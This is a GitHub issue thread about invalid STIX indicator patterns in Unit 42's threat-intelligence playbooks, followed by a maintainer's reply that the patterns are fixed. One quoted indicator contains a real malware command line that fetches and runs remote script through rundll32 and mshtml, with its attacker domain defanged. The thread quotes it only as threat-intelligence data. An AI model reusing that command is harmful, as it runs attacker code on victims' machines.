### ISSUE TITLE
Invalid STIX indicator patterns

### ISSUE THREAD

**Issue by s4bs** [pan-unit42/playbook_viewer#9]
Firstly, thank you for this amazing resource, the playbooks have been very useful for my current project.

However, a lot of the new indicators in the playbooks have invalid STIX patterns. This can be verified by running the [CTI Pattern Validator](https://github.com/oasis-open/cti-pattern-validator) provided by MITRE.

For eg., indicator--8daedb2f-bc56-45eb-9eab-916e23cb957a from rancor.json has pattern [\\"file:name = 'Mk3tj.doc'\\"]. 

Inputting it in the pattern validator yields the following error:
**FAIL: Error found at line 1:1. mismatched input '\' expecting {IdentifierWithoutHyphen, IdentifierWithHyphen, '('}**

Similarly, indicator--36ffed63-3a43-4572-950e-bbe451ae2627 from rancor.json has pattern [process:command_line = '\"\"rundll32 javascript:\\\"\"\\..\\mshtml,RunHTMLApplication \\\"\";document.write();try{GetObject(\\\"\"script:http://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico\\\"\");}catch(e){};window.close()\"\"\" &amp; \" /mo 10 /F\"\"']

Inputting it in the pattern validator yields the following error:
**FAIL: Error found at line 1:24. mismatched input ''' expecting {IntNegLiteral, IntPosLiteral, FloatNegLiteral, FloatPosLiteral, HexLiteral, BinaryLiteral, StringLiteral, BoolLiteral, TimestampLiteral}**

There are invalid patterns such as this littered across the different playbooks, and this makes using the [CTI Pattern Matcher](https://github.com/oasis-open/cti-pattern-matcher) very difficult for my use case as it will fail when encountering an invalid pattern.

**Comment by eiyuki** [comment]
I have fixed and verified that all of the invalid indicators are valid according to the latest CTI Pattern Validator (stix2-patterns 1.1.0 with antlr4-python2-runtime 4.7.2).

As a side note, I ran into similar issues with invalid patterns causing crashes in other libraries that work with STIX 2.0. Manually patching the libraries may help if your project is run locally and not in production. I found this useful for testing and debugging.

There is also now documentation about the structure of a Playbook [here](https://github.com/pan-unit42/playbook_viewer/blob/master/docs/Playbook%20Structure.md)
